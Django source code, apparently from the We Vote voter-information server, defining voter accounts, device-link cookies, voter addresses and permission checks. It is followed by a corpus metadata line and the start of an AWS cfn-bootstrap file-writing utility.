status = "SAVED_VOTER_FACEBOOK_VALUES"
except Exception as e:
status = "UNABLE_TO_SAVE_VOTER_FACEBOOK_VALUES"
success = False
handle_record_not_saved_exception(e, logger=logger, exception_message_optional=status)
results = {
'status': status,
'success': success,
'voter': voter,
}
return results
def save_twitter_user_values(self, voter, twitter_user_object):
try:
# 'id': 132728535,
if positive_value_exists(twitter_user_object.id):
voter.twitter_id = twitter_user_object.id
# 'id_str': '132728535',
# 'utc_offset': 32400,
# 'description': "Cars, Musics, Games, Electronics, toys, food, etc... I'm just a typical boy!",
# 'profile_image_url': 'http://a1.twimg.com/profile_images/1213351752/_2_2__normal.jpg',
if positive_value_exists(twitter_user_object.profile_image_url_https):
voter.twitter_profile_image_url_https = twitter_user_object.profile_image_url_https
# 'profile_background_image_url': 'http://a2.twimg.com/a/1294785484/images/themes/theme15/bg.png',
# 'screen_name': 'jaeeeee',
if positive_value_exists(twitter_user_object.screen_name):
voter.twitter_screen_name = twitter_user_object.screen_name
# 'lang': 'en',
# 'name': 'Jae Jung Chung',
# 'url': 'http://www.carbonize.co.kr',
# 'time_zone': 'Seoul',
voter.save()
success = True
status = "SAVED_VOTER_TWITTER_VALUES"
except Exception as e:
status = "UNABLE_TO_SAVE_VOTER_TWITTER_VALUES"
success = False
handle_record_not_saved_exception(e, logger=logger, exception_message_optional=status)
results = {
'status': status,
'success': success,
'voter': voter,
}
return results
def save_twitter_user_values_from_dict(self, voter, twitter_user_dict):
try:
# 'id': 132728535,
if 'id' in twitter_user_dict:
voter.twitter_id = twitter_user_dict['id']
# 'id_str': '132728535',
# 'utc_offset': 32400,
# 'description': "Cars, Musics, Games, Electronics, toys, food, etc... I'm just a typical boy!",
# 'profile_image_url': 'http://a1.twimg.com/profile_images/1213351752/_2_2__normal.jpg',
if 'profile_image_url_https' in twitter_user_dict:
voter.twitter_profile_image_url_https = twitter_user_dict['profile_image_url_https']
# 'profile_background_image_url': 'http://a2.twimg.com/a/1294785484/images/themes/theme15/bg.png',
# 'screen_name': 'jaeeeee',
if 'screen_name' in twitter_user_dict:
voter.twitter_screen_name = twitter_user_dict['screen_name']
# 'lang': 'en',
# 'name': 'Jae Jung Chung',
# 'url': 'http://www.carbonize.co.kr',
# 'time_zone': 'Seoul',
voter.save()
success = True
status = "SAVED_VOTER_TWITTER_VALUES"
except Exception as e:
status = "UNABLE_TO_SAVE_VOTER_TWITTER_VALUES"
success = False
handle_record_not_saved_exception(e, logger=logger, exception_message_optional=status)
results = {
'status': status,
'success': success,
'voter': voter,
}
return results
def update_voter_photos(self, voter_id, facebook_profile_image_url_https, facebook_photo_variable_exists):
results = self.retrieve_voter(voter_id)
if results['voter_found']:
voter = results['voter']
try:
if facebook_photo_variable_exists:
voter.facebook_profile_image_url_https = facebook_profile_image_url_https
voter.save()
status = "SAVED_VOTER_PHOTOS"
success = True
except Exception as e:
status = "UNABLE_TO_SAVE_VOTER_PHOTOS"
success = False
handle_record_not_saved_exception(e, logger=logger, exception_message_optional=status)
else:
# If here, we were unable to find pre-existing Voter
status = "UNABLE_TO_FIND_VOTER_FOR_UPDATE_VOTER_PHOTOS"
voter = Voter()
success = False
results = {
'status': status,
'success': success,
'voter': voter,
}
return results
def update_voter(self, voter_id, facebook_email, facebook_profile_image_url_https,
first_name, middle_name, last_name,
twitter_profile_image_url_https):
voter_updated = False
results = self.retrieve_voter(voter_id)
if results['voter_found']:
voter = results['voter']
try:
should_save_voter = False
if facebook_email is not False:
voter.facebook_email = facebook_email
should_save_voter = True
if facebook_profile_image_url_https is not False:
voter.facebook_profile_image_url_https = facebook_profile_image_url_https
should_save_voter = True
if first_name is not False:
voter.first_name = first_name
should_save_voter = True
if middle_name is not False:
voter.middle_name = middle_name
should_save_voter = True
if last_name is not False:
voter.last_name = last_name
should_save_voter = True
if twitter_profile_image_url_https is not False:
                voter.twitter_profile_image_url_https = twitter_profile_image_url_https
should_save_voter = True
if should_save_voter:
voter.save()
voter_updated = True
status = "UPDATED_VOTER"
success = True
except Exception as e:
status = "UNABLE_TO_UPDATE_VOTER"
success = False
voter_updated = False
else:
# If here, we were unable to find pre-existing Voter
status = "UNABLE_TO_FIND_VOTER_FOR_UPDATE_VOTER"
voter = Voter()
success = False
voter_updated = False
results = {
'status': status,
'success': success,
'voter': voter,
'voter_updated': voter_updated,
}
return results
class Voter(AbstractBaseUser):
"""
A fully featured User model with admin-compliant permissions that uses
a full-length email field as the username.
No fields are required, since at its very simplest, we only need the voter_id based on a voter_device_id.
"""
alphanumeric = RegexValidator(r'^[0-9a-zA-Z]*$', message='Only alphanumeric characters are allowed.')
# The we_vote_id identifier is unique across all We Vote sites, and allows us to share our voter info with other
# organizations running the we_vote server
# It starts with "wv" then we add on a database specific identifier like "3v" (WeVoteSetting.site_unique_id_prefix)
# then the string "voter", and then a sequential integer like "123".
# We keep the last value in WeVoteSetting.we_vote_id_last_org_integer
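    # e.g. assembling those pieces yields an identifier that looks like "wv3vvoter123"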
we_vote_id = models.CharField(
verbose_name="we vote permanent id", max_length=255, null=True, blank=True, unique=True)
# When a person using an organization's Twitter handle signs in, we create a voter account. This is how
# we link the voter account to the organization.
linked_organization_we_vote_id = models.CharField(
verbose_name="we vote id for linked organization", max_length=255, null=True, blank=True, unique=True)
# Redefine the basic fields that would normally be defined in User
# username = models.CharField(unique=True, max_length=20, validators=[alphanumeric]) # Increase max_length to 255
email = models.EmailField(verbose_name='email address', max_length=255, unique=True, null=True, blank=True)
first_name = models.CharField(verbose_name='first name', max_length=255, null=True, blank=True)
middle_name = models.CharField(max_length=255, null=True, blank=True)
last_name = models.CharField(verbose_name='last name', max_length=255, null=True, blank=True)
date_joined = models.DateTimeField(verbose_name='date joined', auto_now_add=True)
is_active = models.BooleanField(default=True)
is_admin = models.BooleanField(default=False)
is_verified_volunteer = models.BooleanField(default=False)
# Facebook session information
facebook_id = models.BigIntegerField(verbose_name="facebook big integer id", null=True, blank=True)
facebook_email = models.EmailField(verbose_name='facebook email address', max_length=255, unique=False,
null=True, blank=True)
fb_username = models.CharField(unique=True, max_length=20, validators=[alphanumeric], null=True)
facebook_profile_image_url_https = models.URLField(verbose_name='url of image from facebook', blank=True, null=True)
# Twitter session information
twitter_id = models.BigIntegerField(verbose_name="twitter big integer id", null=True, blank=True)
twitter_screen_name = models.CharField(verbose_name='twitter screen name / handle',
max_length=255, null=True, unique=False)
twitter_profile_image_url_https = models.URLField(verbose_name='url of logo from twitter', blank=True, null=True)
twitter_request_token = models.TextField(verbose_name='twitter request token', null=True, blank=True)
twitter_request_secret = models.TextField(verbose_name='twitter request secret', null=True, blank=True)
twitter_access_token = models.TextField(verbose_name='twitter access token', null=True, blank=True)
twitter_access_secret = models.TextField(verbose_name='twitter access secret', null=True, blank=True)
twitter_connection_active = models.BooleanField(default=False)
# Custom We Vote fields
# image_displayed
# image_twitter
# image_facebook
# blocked
# flags (ex/ signed_in)
# password_hashed
# password_reset_key
# password_reset_request_time
# last_activity
# The unique ID of the election this voter is currently looking at. (Provided by Google Civic)
# DALE 2015-10-29 We are replacing this with looking up the value in the ballot_items table, and then
# storing in cookie
# current_google_civic_election_id = models.PositiveIntegerField(
# verbose_name="google civic election id", null=True, unique=False)
objects = VoterManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = [] # Since we need to store a voter based solely on voter_device_id, no values are required
# We override the save function to allow for the email field to be empty. If NOT empty, email must be unique.
# We also want to auto-generate we_vote_id
def save(self, *args, **kwargs):
if self.email:
self.email = self.email.lower().strip() # Hopefully reduces junk to ""
if self.email != "": # If it's not blank
if not validate_email(self.email): # ...make sure it is a valid email
# If it isn't a valid email, don't save the value as an email -- just save a blank field
self.email = None
if self.email == "":
self.email = None
if self.we_vote_id:
self.we_vote_id = self.we_vote_id.strip().lower()
if self.we_vote_id == "" or self.we_vote_id is None: # If there isn't a value...
# ...generate a new id
site_unique_id_prefix = fetch_site_unique_id_prefix()
next_local_integer = fetch_next_we_vote_id_last_voter_integer()
# "wv" = We Vote
# site_unique_id_prefix = a generated (or assigned) unique id for one server running We Vote
# "voter" = tells us this is a unique id for an org
# next_integer = a unique, sequential integer for this server - not necessarily tied to database id
self.we_vote_id = "wv{site_unique_id_prefix}voter{next_integer}".format(
site_unique_id_prefix=site_unique_id_prefix,
next_integer=next_local_integer,
)
# TODO we need to deal with the situation where we_vote_id is NOT unique on save
super(Voter, self).save(*args, **kwargs)
def get_full_name(self):
full_name = self.first_name if positive_value_exists(self.first_name) else ''
full_name += " " if positive_value_exists(self.first_name) and positive_value_exists(self.last_name) else ''
full_name += self.last_name if positive_value_exists(self.last_name) else ''
return full_name
def get_short_name(self):
# return self.first_name
# The user is identified by their email address
return self.email
def voter_can_retrieve_account(self):
if positive_value_exists(self.email):
return True
else:
return False
def __str__(self): # __unicode__ on Python 2
# return self.get_full_name(self)
return str(self.email)
def has_perm(self, perm, obj=None):
"""
Does the user have a specific permission?
"""
# Simplest possible answer: Yes, always
return True
def has_module_perms(self, app_label):
"""
Does the user have permissions to view the app `app_label`?
"""
# Simplest possible answer: Yes, always
return True
@property
def is_staff(self):
"""
Is the user a member of staff?
"""
# Simplest possible answer: All admins are staff
return self.is_admin
def voter_photo_url(self):
if self.facebook_profile_image_url_https:
return self.facebook_profile_image_url_https
elif self.twitter_profile_image_url_https:
return self.twitter_profile_image_url_https
return ''
def signed_in_personal(self):
if positive_value_exists(self.email) or self.signed_in_facebook() or self.signed_in_twitter():
# or positive_value_exists(self.is_authenticated()):
return True
return False
def signed_in_facebook(self):
if positive_value_exists(self.facebook_id):
return True
return False
def signed_in_google(self):
return False
def signed_in_twitter(self):
if positive_value_exists(self.twitter_access_token):
return True
return False
class VoterDeviceLink(models.Model):
"""
There can be many voter_device_id's for every voter_id. (See commentary in class VoterDeviceLinkManager)
"""
# The id for this object is not used in any searches
# A randomly generated identifier that gets stored as a cookie on a single device
# See wevote_functions.functions, function generate_voter_device_id for a discussion of voter_device_id length
voter_device_id = models.CharField(verbose_name='voter device id',
max_length=255, null=False, blank=False, unique=True)
# The voter_id associated with voter_device_id
voter_id = models.BigIntegerField(verbose_name="voter unique identifier", null=False, blank=False, unique=False)
# The unique ID of the election (provided by Google Civic) that the voter is looking at on this device
google_civic_election_id = models.PositiveIntegerField(
verbose_name="google civic election id", default=0, null=False)
def generate_voter_device_id(self):
# A simple mapping to this function
return generate_voter_device_id()
class VoterDeviceLinkManager(models.Model):
"""
In order to start gathering information about a voter prior to authentication, we use a long randomized string
stored as a browser cookie. As soon as we get any other identifiable information from a voter (like an email
address), we capture that so the Voter record can be portable among devices. Note that any voter might be using
We Vote from different browsers. The VoterDeviceLink links one or more voter_device_id's to one voter_id.
Since (prior to authentication) every voter_device_id will have its own voter_id record, we merge and delete Voter
records whenever we can.
"""
def __str__(self): # __unicode__ on Python 2
return "Voter Device Id Manager"
def delete_all_voter_device_links(self, voter_device_id):
voter_id = fetch_voter_id_from_voter_device_link(voter_device_id)
try:
if positive_value_exists(voter_id):
VoterDeviceLink.objects.filter(voter_id=voter_id).delete()
status = "DELETE_ALL_VOTER_DEVICE_LINKS_SUCCESSFUL"
success = True
else:
status = "DELETE_ALL_VOTER_DEVICE_LINKS-MISSING_VARIABLES"
success = False
except Exception as e:
status = "DELETE_ALL_VOTER_DEVICE_LINKS-DATABASE_DELETE_EXCEPTION"
success = False
results = {
'success': success,
'status': status,
}
return results
def delete_voter_device_link(self, voter_device_id):
try:
if positive_value_exists(voter_device_id):
VoterDeviceLink.objects.filter(voter_device_id=voter_device_id).delete()
status = "DELETE_VOTER_DEVICE_LINK_SUCCESSFUL"
success = True
else:
status = "DELETE_VOTER_DEVICE_LINK-MISSING_VARIABLES"
success = False
except Exception as e:
status = "DELETE_VOTER_DEVICE_LINK-DATABASE_DELETE_EXCEPTION"
success = False
results = {
'success': success,
'status': status,
}
return results
def retrieve_voter_device_link_from_voter_device_id(self, voter_device_id):
voter_id = 0
voter_device_link_id = 0
voter_device_link_manager = VoterDeviceLinkManager()
results = voter_device_link_manager.retrieve_voter_device_link(voter_device_id, voter_id, voter_device_link_id)
return results
def retrieve_voter_device_link(self, voter_device_id, voter_id=0, voter_device_link_id=0):
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
voter_device_link_on_stage = VoterDeviceLink()
try:
if positive_value_exists(voter_device_id):
voter_device_link_on_stage = VoterDeviceLink.objects.get(voter_device_id=voter_device_id)
voter_device_link_id = voter_device_link_on_stage.id
elif positive_value_exists(voter_id):
voter_device_link_on_stage = VoterDeviceLink.objects.get(voter_id=voter_id)
# If still here, we found an existing position
voter_device_link_id = voter_device_link_on_stage.id
elif positive_value_exists(voter_device_link_id):
voter_device_link_on_stage = VoterDeviceLink.objects.get(id=voter_device_link_id)
# If still here, we found an existing position
voter_device_link_id = voter_device_link_on_stage.id
else:
voter_device_link_id = 0
except VoterDeviceLink.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
error_result = True
exception_multiple_object_returned = True
except VoterDeviceLink.DoesNotExist:
error_result = True
exception_does_not_exist = True
results = {
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'voter_device_link_found': True if voter_device_link_id > 0 else False,
'voter_device_link': voter_device_link_on_stage,
}
return results
def save_new_voter_device_link(self, voter_device_id, voter_id):
error_result = False
exception_record_not_saved = False
missing_required_variables = False
voter_device_link_on_stage = VoterDeviceLink()
voter_device_link_id = 0
try:
if positive_value_exists(voter_device_id) and positive_value_exists(voter_id):
voter_device_link_on_stage.voter_device_id = voter_device_id
voter_device_link_on_stage.voter_id = voter_id
voter_device_link_on_stage.save()
voter_device_link_id = voter_device_link_on_stage.id
else:
missing_required_variables = True
voter_device_link_id = 0
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
error_result = True
exception_record_not_saved = True
results = {
'error_result': error_result,
'missing_required_variables': missing_required_variables,
'RecordNotSaved': exception_record_not_saved,
'voter_device_link_created': True if voter_device_link_id > 0 else False,
'voter_device_link': voter_device_link_on_stage,
}
return results
def update_voter_device_link_with_election_id(self, voter_device_link, google_civic_election_id):
voter_object = None
return self.update_voter_device_link(voter_device_link, voter_object, google_civic_election_id)
def update_voter_device_link(self, voter_device_link, voter_object=None, google_civic_election_id=0):
"""
Update existing voter_device_link with a new voter_id or google_civic_election_id
"""
error_result = False
exception_record_not_saved = False
missing_required_variables = False
voter_device_link_id = 0
try:
if positive_value_exists(voter_device_link.voter_device_id):
if voter_object and positive_value_exists(voter_object.id):
voter_device_link.voter_id = voter_object.id
if positive_value_exists(google_civic_election_id):
voter_device_link.google_civic_election_id = google_civic_election_id
elif google_civic_election_id == 0:
# If set literally to 0, save it
voter_device_link.google_civic_election_id = 0
voter_device_link.save()
voter_device_link_id = voter_device_link.id
else:
missing_required_variables = True
voter_device_link_id = 0
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
error_result = True
exception_record_not_saved = True
results = {
'error_result': error_result,
'missing_required_variables': missing_required_variables,
'RecordNotSaved': exception_record_not_saved,
'voter_device_link_updated': True if voter_device_link_id > 0 else False,
'voter_device_link': voter_device_link,
}
return results
# This method *just* returns the voter_id or 0
def fetch_voter_id_from_voter_device_link(voter_device_id):
voter_device_link_manager = VoterDeviceLinkManager()
results = voter_device_link_manager.retrieve_voter_device_link_from_voter_device_id(voter_device_id)
if results['voter_device_link_found']:
voter_device_link = results['voter_device_link']
return voter_device_link.voter_id
return 0
# This method *just* returns the voter_id or 0
def fetch_voter_id_from_voter_we_vote_id(we_vote_id):
voter_manager = VoterManager()
results = voter_manager.retrieve_voter_by_we_vote_id(we_vote_id)
if results['voter_found']:
voter = results['voter']
return voter.id
return 0
# This method *just* returns the voter_we_vote_id or ""
def fetch_voter_we_vote_id_from_voter_id(voter_id):
voter_manager = VoterManager()
results = voter_manager.retrieve_voter_by_id(voter_id)
if results['voter_found']:
voter = results['voter']
return voter.we_vote_id
return ""
def retrieve_voter_authority(request):
voter_api_device_id = get_voter_api_device_id(request)
voter_manager = VoterManager()
results = voter_manager.retrieve_voter_from_voter_device_id(voter_api_device_id)
if results['voter_found']:
voter = results['voter']
authority_results = {
'voter_found': True,
'is_active': positive_value_exists(voter.is_active),
'is_admin': positive_value_exists(voter.is_admin),
'is_verified_volunteer': positive_value_exists(voter.is_verified_volunteer),
}
return authority_results
authority_results = {
'voter_found': False,
'is_active': False,
'is_admin': False,
'is_verified_volunteer': False,
}
return authority_results
def voter_has_authority(request, authority_required, authority_results=None):
if not authority_results:
authority_results = retrieve_voter_authority(request)
if not positive_value_exists(authority_results['is_active']):
return False
if 'admin' in authority_required:
if positive_value_exists(authority_results['is_admin']):
return True
if 'verified_volunteer' in authority_required:
if positive_value_exists(authority_results['is_verified_volunteer']) or \
positive_value_exists(authority_results['is_admin']):
return True
return False
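# Typical usage in a view (a sketch; how a denial is handled is up to the caller):
#   if not voter_has_authority(request, {'verified_volunteer'}):
#       ...  # deny access, e.g. redirect the voter to a sign-in page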
# class VoterJurisdictionLink(models.Model):
# """
# All of the jurisdictions the Voter is in
# """
# voter = models.ForeignKey(Voter, null=False, blank=False, verbose_name='voter')
# jurisdiction = models.ForeignKey(Jurisdiction,
# null=False, blank=False, verbose_name="jurisdiction this voter votes in")
BALLOT_ADDRESS = 'B'
MAILING_ADDRESS = 'M'
FORMER_BALLOT_ADDRESS = 'F'
ADDRESS_TYPE_CHOICES = (
(BALLOT_ADDRESS, 'Address Where Registered to Vote'),
(MAILING_ADDRESS, 'Mailing Address'),
(FORMER_BALLOT_ADDRESS, 'Prior Address'),
)
class VoterAddress(models.Model):
"""
An address of a registered voter for ballot purposes.
"""
#
# We are relying on built-in Python id field
# The voter_id that owns this address
voter_id = models.BigIntegerField(verbose_name="voter unique identifier", null=False, blank=False, unique=False)
address_type = models.CharField(
verbose_name="type of address", max_length=1, choices=ADDRESS_TYPE_CHOICES, default=BALLOT_ADDRESS)
text_for_map_search = models.CharField(max_length=255, blank=False, null=False, verbose_name='address as entered')
latitude = models.CharField(max_length=255, blank=True, null=True, verbose_name='latitude returned from Google')
longitude = models.CharField(max_length=255, blank=True, null=True, verbose_name='longitude returned from Google')
normalized_line1 = models.CharField(max_length=255, blank=True, null=True,
verbose_name='normalized address line 1 returned from Google')
normalized_line2 = models.CharField(max_length=255, blank=True, null=True,
verbose_name='normalized address line 2 returned from Google')
normalized_city = models.CharField(max_length=255, blank=True, null=True,
verbose_name='normalized city returned from Google')
normalized_state = models.CharField(max_length=255, blank=True, null=True,
verbose_name='normalized state returned from Google')
normalized_zip = models.CharField(max_length=255, blank=True, null=True,
verbose_name='normalized zip returned from Google')
# This is the election_id last found for this address
google_civic_election_id = models.PositiveIntegerField(
verbose_name="google civic election id for this address", null=True, unique=False)
# The last election day this address was used to retrieve a ballot
election_day_text = models.CharField(verbose_name="election day", max_length=255, null=True, blank=True)
refreshed_from_google = models.BooleanField(
verbose_name="have normalized fields been updated from Google since address change?", default=False)
class VoterAddressManager(models.Model):
def __unicode__(self):
return "VoterAddressManager"
def retrieve_ballot_address_from_voter_id(self, voter_id):
voter_address_id = 0
address_type = BALLOT_ADDRESS
voter_address_manager = VoterAddressManager()
return voter_address_manager.retrieve_address(voter_address_id, voter_id, address_type)
def retrieve_ballot_map_text_from_voter_id(self, voter_id):
results = self.retrieve_ballot_address_from_voter_id(voter_id)
ballot_map_text = ''
if results['voter_address_found']:
voter_address = results['voter_address']
minimum_normalized_address_data_exists = positive_value_exists(
voter_address.normalized_city) or positive_value_exists(
voter_address.normalized_state) or positive_value_exists(voter_address.normalized_zip)
if minimum_normalized_address_data_exists:
ballot_map_text += voter_address.normalized_line1 \
if positive_value_exists(voter_address.normalized_line1) else ''
ballot_map_text += ", " \
if positive_value_exists(voter_address.normalized_line1) \
and positive_value_exists(voter_address.normalized_city) \
else ''
ballot_map_text += voter_address.normalized_city \
if positive_value_exists(voter_address.normalized_city) else ''
ballot_map_text += ", " \
if positive_value_exists(voter_address.normalized_city) \
and positive_value_exists(voter_address.normalized_state) \
else ''
ballot_map_text += voter_address.normalized_state \
if positive_value_exists(voter_address.normalized_state) else ''
ballot_map_text += " " + voter_address.normalized_zip \
if positive_value_exists(voter_address.normalized_zip) else ''
elif positive_value_exists(voter_address.text_for_map_search):
ballot_map_text += voter_address.text_for_map_search
return ballot_map_text
def retrieve_address(self, voter_address_id, voter_id=0, address_type=''):
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
voter_address_on_stage = VoterAddress()
voter_address_has_value = False
if not positive_value_exists(address_type):
# Provide a default
address_type = BALLOT_ADDRESS
try:
if positive_value_exists(voter_address_id):
voter_address_on_stage = VoterAddress.objects.get(id=voter_address_id)
voter_address_id = voter_address_on_stage.id
voter_address_found = True
status = "VOTER_ADDRESS_FOUND_BY_ID"
success = True
voter_address_has_value = True if positive_value_exists(voter_address_on_stage.text_for_map_search) \
else False
elif positive_value_exists(voter_id) and address_type in (BALLOT_ADDRESS, MAILING_ADDRESS,
FORMER_BALLOT_ADDRESS):
voter_address_on_stage = VoterAddress.objects.get(voter_id=voter_id, address_type=address_type)
# If still here, we found an existing address
voter_address_id = voter_address_on_stage.id
voter_address_found = True
status = "VOTER_ADDRESS_FOUND_BY_VOTER_ID_AND_ADDRESS_TYPE"
success = True
voter_address_has_value = True if positive_value_exists(voter_address_on_stage.text_for_map_search) \
else False
else:
voter_address_found = False
status = "VOTER_ADDRESS_NOT_FOUND-MISSING_REQUIRED_VARIABLES"
success = False
except VoterAddress.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
error_result = True
status = "VOTER_ADDRESS_MULTIPLE_OBJECTS_RETURNED"
exception_multiple_object_returned = True
success = False
voter_address_found = False
except VoterAddress.DoesNotExist:
error_result = True
status = "VOTER_ADDRESS_DOES_NOT_EXIST"
exception_does_not_exist = True
success = True
voter_address_found = False
results = {
'success': success,
'status': status,
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'voter_address_found': voter_address_found,
'voter_address_has_value': voter_address_has_value,
'voter_address_id': voter_address_id,
'voter_address': voter_address_on_stage,
}
return results
# # TODO TEST THIS
# def retrieve_addresses(self, voter_id):
# error_result = False
# exception_does_not_exist = False
# # voter_addresses_on_stage = # How to typecast?
# number_of_addresses = 0
#
# try:
# if voter_id > 0:
# voter_addresses_on_stage = VoterAddress.objects.get(voter_id=voter_id)
# number_of_addresses = len(voter_addresses_on_stage)
# except VoterAddress.DoesNotExist:
# error_result = True
# exception_does_not_exist = True
#
# results = {
# 'error_result': error_result,
# 'DoesNotExist': exception_does_not_exist,
# 'voter_addresses_found': True if number_of_addresses > 0 else False,
# 'voter_addresses_on_stage': voter_addresses_on_stage,
# 'number_of_addresses': number_of_addresses,
# }
# return results
def update_or_create_voter_address(self, voter_id, address_type, raw_address_text):
"""
NOTE: This approach won't support multiple FORMER_BALLOT_ADDRESS
:param voter_id:
:param address_type:
:param raw_address_text:
:return:
"""
status = ''
exception_multiple_object_returned = False
new_address_created = False
voter_address_on_stage = None
voter_address_on_stage_found = False
if positive_value_exists(voter_id) and address_type in (BALLOT_ADDRESS, MAILING_ADDRESS, FORMER_BALLOT_ADDRESS):
try:
updated_values = {
# Values we search against
'voter_id': voter_id,
'address_type': address_type,
# The rest of the values are to be saved
'text_for_map_search': raw_address_text,
'latitude': None,
'longitude': None,
'normalized_line1': None,
'normalized_line2': None,
'normalized_city': None,
'normalized_state': None,
'normalized_zip': None,
# We clear out former values for these so voter_ballot_items_retrieve_for_api resets them
'refreshed_from_google': False,
'google_civic_election_id': 0,
'election_day_text': '',
}
voter_address_on_stage, new_address_created = VoterAddress.objects.update_or_create(
voter_id__exact=voter_id, address_type=address_type, defaults=updated_values)
voter_address_on_stage_found = voter_address_on_stage.id
success = True
except VoterAddress.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
success = False
status = 'MULTIPLE_MATCHING_ADDRESSES_FOUND'
exception_multiple_object_returned = True
else:
success = False
status = 'MISSING_VOTER_ID_OR_ADDRESS_TYPE'
results = {
'success': success,
'status': status,
'MultipleObjectsReturned': exception_multiple_object_returned,
'voter_address_saved': success,
'address_type': address_type,
'new_address_created': new_address_created,
'voter_address_found': voter_address_on_stage_found,
'voter_address': voter_address_on_stage,
}
return results
def update_voter_address_with_normalized_values(self, voter_id, voter_address_dict):
voter_address_id = 0
address_type = BALLOT_ADDRESS
results = self.retrieve_address(voter_address_id, voter_id, address_type)
if results['success']:
voter_address = results['voter_address']
try:
voter_address.normalized_line1 = voter_address_dict['line1']
voter_address.normalized_city = voter_address_dict['city']
voter_address.normalized_state = voter_address_dict['state']
voter_address.normalized_zip = voter_address_dict['zip']
voter_address.refreshed_from_google = True
voter_address.save()
status = "SAVED_VOTER_ADDRESS_WITH_NORMALIZED_VALUES"
success = True
except Exception as e:
status = "UNABLE_TO_SAVE_VOTER_ADDRESS_WITH_NORMALIZED_VALUES"
success = False
handle_record_not_saved_exception(e, logger=logger, exception_message_optional=status)
else:
# If here, we were unable to find pre-existing VoterAddress
status = "UNABLE_TO_FIND_VOTER_ADDRESS"
voter_address = VoterAddress() # TODO Finish this for "create new" case
success = False
results = {
'status': status,
'success': success,
'voter_address': voter_address,
}
return results
def update_existing_voter_address_object(self, voter_address_object):
results = self.retrieve_address(voter_address_object.id)
if results['success']:
try:
voter_address_object.save() # Save the incoming object
status = "UPDATED_EXISTING_VOTER_ADDRESS"
success = True
voter_address_found = True
except Exception as e:
status = "UNABLE_TO_UPDATE_EXISTING_VOTER_ADDRESS"
success = False
voter_address_found = False
handle_record_not_saved_exception(e, logger=logger, exception_message_optional=status)
else:
# If here, we were unable to find pre-existing VoterAddress
status = "UNABLE_TO_FIND_AND_UPDATE_VOTER_ADDRESS"
voter_address_object = None
success = False
voter_address_found = False
results = {
'status': status,
'success': success,
'voter_address': voter_address_object,
'voter_address_found': voter_address_found,
}
return results
def voter_setup(request):
"""
This is only used for sign in on the API server, and is not used for WebApp
:param request:
:return:
"""
generate_voter_api_device_id_if_needed = True
voter_api_device_id = get_voter_api_device_id(request, generate_voter_api_device_id_if_needed)
voter_id = 0
voter_id_found = False
store_new_voter_api_device_id_in_cookie = True
voter_device_link_manager = VoterDeviceLinkManager()
results = voter_device_link_manager.retrieve_voter_device_link_from_voter_device_id(voter_api_device_id)
if results['voter_device_link_found']:
voter_device_link = results['voter_device_link']
voter_id = voter_device_link.voter_id
voter_id_found = True if positive_value_exists(voter_id) else False
store_new_voter_api_device_id_in_cookie = False if positive_value_exists(voter_id_found) else True
# If existing voter not found, create a new voter
if not voter_id_found:
# Create a new voter and return the id
voter_manager = VoterManager()
results = voter_manager.create_voter()
if results['voter_created']:
voter = results['voter']
voter_id = voter.id
# Now save the voter_device_link
results = voter_device_link_manager.save_new_voter_device_link(voter_api_device_id, voter_id)
if results['voter_device_link_created']:
voter_device_link = results['voter_device_link']
voter_id = voter_device_link.voter_id
voter_id_found = True if voter_id > 0 else False
store_new_voter_api_device_id_in_cookie = True
else:
voter_id = 0
voter_id_found = False
final_results = {
'voter_id': voter_id,
'voter_api_device_id': voter_api_device_id,
'voter_id_found': voter_id_found,
'store_new_voter_api_device_id_in_cookie': store_new_voter_api_device_id_in_cookie,
}
return final_results
| bsd-3-clause | -5,296,734,359,636,039,000 | 42.612293 | 120 | 0.59179 | false |
siwater/Cloudworks | aws-cfn-bootstrap-1.3/cfnbootstrap/file_tool.py | 1 | 9622 | #==============================================================================
# Copyright 2011 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#==============================================================================
from cfnbootstrap import security, util
from cfnbootstrap.construction_errors import ToolError
from contextlib import contextmanager
import base64
import logging
import os
import requests
import stat
_templates_supported = True
try:
from pystache.renderer import Renderer
except ImportError:
_templates_supported = False
try:
import simplejson as json
except ImportError:
import json
log = logging.getLogger("cfn.init")
class FileTool(object):
"""
Writes files to disk
"""
_compare_buffer = 8 * 1024
@classmethod
def is_same_file(cls, f1, f2):
if hasattr(os.path, "samefile"):
return os.path.samefile(f1, f2)
else:
#Crude workaround for os.path.samefile only existing on Unix
return os.path.normcase(os.path.abspath(f1)) == os.path.normcase(os.path.abspath(f2))
@classmethod
def compare_file_contents(cls, f1, f2):
"""
Return true if f1 and f2 have the same content.
"""
if os.path.getsize(f1) != os.path.getsize(f2):
return False
if cls.is_same_file(f1, f2):
return True
# Borrowed from filecmp
with file(f1, 'rb') as fp1:
with file(f2, 'rb') as fp2:
bufsize = 8 * 1024
while True:
b1 = fp1.read(bufsize)
b2 = fp2.read(bufsize)
if b1 != b2:
return False
if not b1:
return True
def apply(self, action, auth_config):
"""
Write a set of files to disk, returning a list of the files that have changed.
Arguments:
action -- a dict of pathname to attributes, such as owner, group, mode, content, and encoding
auth_config -- an AuthenticationConfig object for managing authenticated downloads
Exceptions:
ToolError -- on expected failures
"""
files_changed = []
if not action.keys():
log.debug("No files specified")
return files_changed
for (filename, attribs) in sorted(action.iteritems(), key=lambda pair: pair[0]):
if not os.path.isabs(filename):
raise ToolError('File specified with non-absolute path: %s' % filename)
# The only difference between a file and a symlink is hidden in the mode
file_is_link = "mode" in attribs and stat.S_ISLNK(int(attribs["mode"], 8))
if file_is_link:
if "content" not in attribs:
raise ToolError("Symbolic link specified without a destination")
